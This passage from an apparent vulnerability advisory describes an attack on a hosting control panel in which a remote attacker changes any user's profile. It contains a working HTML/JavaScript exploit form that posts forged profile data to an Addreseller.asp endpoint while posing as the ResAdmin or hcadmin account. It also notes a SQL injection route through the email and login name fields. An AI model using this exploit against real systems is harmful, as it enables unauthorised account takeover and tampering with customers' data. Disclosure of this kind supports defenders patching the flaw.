4- [Remote Attacker] can change all user's profiles.
4.1- Use "Change Profiles.htm"
~~~~~~~~~~~~~~~~4.1.1 ChangeProfiles.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/Hosting/Addreseller.asp?loginname=ResAdmin'
frmChangeProfile.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" /><br />
<form name="frmChangeProfile" action="" method="post" onsubmit="return check()">
UserName: <input type="text" name="loginname" value="Victim User" /> <br />
first name: <input type="text" name="first_name" value="" /> <br />
last name: <input type="text" name="last_name" value="" /> <br />
description: <input type="text" name="description" value="" /> <br />
company: <input type="text" name="company" value="" /> <br />
email: <input type="text" name="email" value="User's Actual Email Address" /> <br />
country: <input type="text" name="country" value="" /> <br />
state: <input type="text" name="state" value="" /> <br />
city: <input type="text" name="city" value="" /> <br />
address: <input type="text" name="address" value="" /> <br />
phone: <input type="text" name="phone" value="" /> <br />
fax: <input type="text" name="fax" value="" /> <br />
zip: <input type="text" name="zip" value="" /> <br />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: "ResAdmin" in "_action" can change to "hcadmin" or an another valid username.
4.2- Now Goto: http://[HC URL]/hosting/xml_addresellerresult.asp
4.3- A user can inject a SQL query in "Email" or "Loginname" field to change user's profile without having his email address too.